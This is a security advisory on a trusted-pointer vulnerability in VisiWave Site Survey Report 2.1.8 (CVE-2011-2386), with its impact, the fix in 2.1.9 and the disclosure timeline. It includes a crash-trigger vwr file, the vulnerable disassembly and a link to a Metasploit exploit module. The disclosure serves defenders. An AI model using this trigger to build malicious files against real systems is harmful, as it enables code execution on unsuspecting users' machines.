VisiWave Site Survey Report Trusted Pointer (SS-2011-005)

May 25, 2011

  • Title: VisiWave Site Survey Report Trusted Pointer
  • Version: 1.0
  • Issue type: Trusted pointer 
  • Affected vendor: VisiWave
  • Release date: 25/05/2011
  • Discovered by: Steven Seeley
  • Issue status: Patch available

Summary

stratsec has identified a trusted pointer vulnerability within the VisiWave Site Survey Reporting tool. The vulnerability can be triggered by opening a specially crafted report file. This vulnerability can lead to remote code execution if a user is social engineered into opening a malicious report file. Failed attempts will likely lead to a denial of service condition.
 

Description

VisiWave Site Survey Report allows you to interactively visualize the survey data as well as create a detailed, permanent record of the site survey.
 
The interactive analysis tool allows you to quickly visualize the large sampling of data that was collected using the data collection application. The data can be viewed in tabular form, as a 3D contour surface, as a 2D isotropic contour plot, as well as many other effective visualisation techniques.
 
During installation, the application registers two file types (vws and vwr) to the windows file type extension list. Once this process is complete, the two file types will open natively using the VisiWave applications. A user can simply double click on a vwr file and the VisiWave Site Survey Report application will then process the file.
 

Impact

A remote attacker could social engineer a user into double clicking a malicious vwr file which would likely result in remote code execution running with privileges as the currently logged in user.
 
Additionally, the user could simply open the malicious vwr file from the file dialog box contained within the VisiWave Site Survey Report application and trigger the vulnerability.
 

Affected products

  • VisiWave version 2.1.8
  • Previous versions are likely affected

Technical Details

When processing vwr files, VisiWaveReport.exe attempts to match a valid pointer based on the ‘type’ property. Valid type properties include ‘Properties’, ‘TitlePage’, ‘Details’, ‘Graph’, ‘Table’, ‘Text’ and ‘Image’. During processing, if the match is not found, then the function that processes the ‘type’ property will still treat it as a valid pointer and execute an indirect call on that value. By specifying an arbitrary value for the ‘type’ property within a vwr file, it is possible to trigger code execution.

Below is an example of a vwr trigger that sets the pointer to 0x42424242 in EDX:
 
FileType: SSREPORT
Product: VisiWave Site Survey, 1.6.5 Beta
FileVersion: 10
Item: Global Properties
Checked: 1
Type: BBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
SurveyFile: C:\Program Files\VisiWave Site Survey\Samples\SampleData.vws
FloorPlanImageReport: C:\Program Files\VisiWave Site Survey\Samples\SampleFloorplan.gif
DefaultOrientation: 0
Header: 
Footer: @PAGE of @PAGES
LeftMargin: 100
RightMargin: 100
TopMargin: 50
BottomMargin: 50
Item: Kalamazoo College Upjohn Library
Checked: 1
 
The trigger file will reach the following vulnerable code in VisiWaveReport.exe:
  
0041BADD 8B16 MOV EDX, DWORD PTR DS:[ESI] ; Move the attacker controlled value into EDX (\x42)
0041BADF 8D4424 38 LEA EAX, DWORD PTR SS:[ESP+38]
0041BAE3 50 PUSH EAX
0041BAE4 57 PUSH EDI
0041BAE5 8BCE MOV ECX,ESI
0041BAE7 FF52 10 CALL DWORD PTR DS:[EDX+10] ; call the attackers trusted value at + 10.
 
At crash time, there are many application specific pointers that an attacker can control. One of these pointers could be used to dereference and redirect the execution path from the EDX register.
 

Proof of concept

A proof of concept exploit has been developed by Steven Seeley and Rocco Calvi for the Metasploit framework. The exploit code will circumvent ASLR and DEP in its current state and work under the Windows 7 environment.
 
The code can be found in Metasploit’s repository:
  • http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/fileformat/visiwave_vwr_type.rb 

Solution

Update to version 2.1.9.
 

Response timeline

  • 04/05/2011 - Vendor notified.
  • 05/05/2011 - Vendor acknowledges receipt of advisory.
  • 05/05/2011 - Vendor confirms issue presence.
  • 05/05/2011 - Fix release date agreed as 19/05/2011
  • 20/05/2011 - Vendor releases updated version
  • 23/05/2011 - stratsec confirms update resolves issue
  • 25/05/2011 - Advisory published

References

  • Vendor advisory: http://www.visiwave.com/blog/index.php?/archives/4-Version-2.1.9-Released.html
  • OSVDB item: http://osvdb.org/show/osvdb/72464 
  • CVE reference: CVE-2011-2386

Download advisory